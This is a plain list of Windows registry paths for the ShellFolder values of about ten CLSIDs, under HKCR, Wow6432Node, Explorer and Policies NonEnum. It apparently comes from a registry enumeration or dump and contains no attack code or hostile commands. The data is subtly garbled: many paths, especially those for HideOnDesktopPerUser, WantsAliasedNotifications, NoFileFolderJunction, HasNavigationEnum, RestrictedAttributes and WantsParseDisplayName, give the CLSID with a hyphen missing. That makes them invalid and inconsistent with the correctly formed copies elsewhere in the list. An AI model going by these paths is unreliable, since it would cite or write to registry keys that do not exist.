HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{4336A54D-038B-4685-AB02-99BB52D3FB8B}
HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A80800361B1103}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_CLASSES_ROOT\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE1D8870FDCBA0}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_CLASSES_ROOT\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454BEB04E94C819}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{89D83576-6BD1-4C86-9454-BEB04E94C819}
HKEY_CLASSES_ROOT\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E4B2D810D956B}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{9343812E-1C37-4A49-A12E-4B2D810D956B}
HKEY_CLASSES_ROOT\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B0FBD52D-C4A7-4A19-985D11309D1AC8AE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B0FBD52D-C4A7-4A19-985D-11309D1AC8AE}
HKEY_CLASSES_ROOT\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78AD1F5659CBA93}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
HKEY_CLASSES_ROOT\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086B309680C6B7E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
HKEY_CLASSES_ROOT\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\RestrictedAttributes
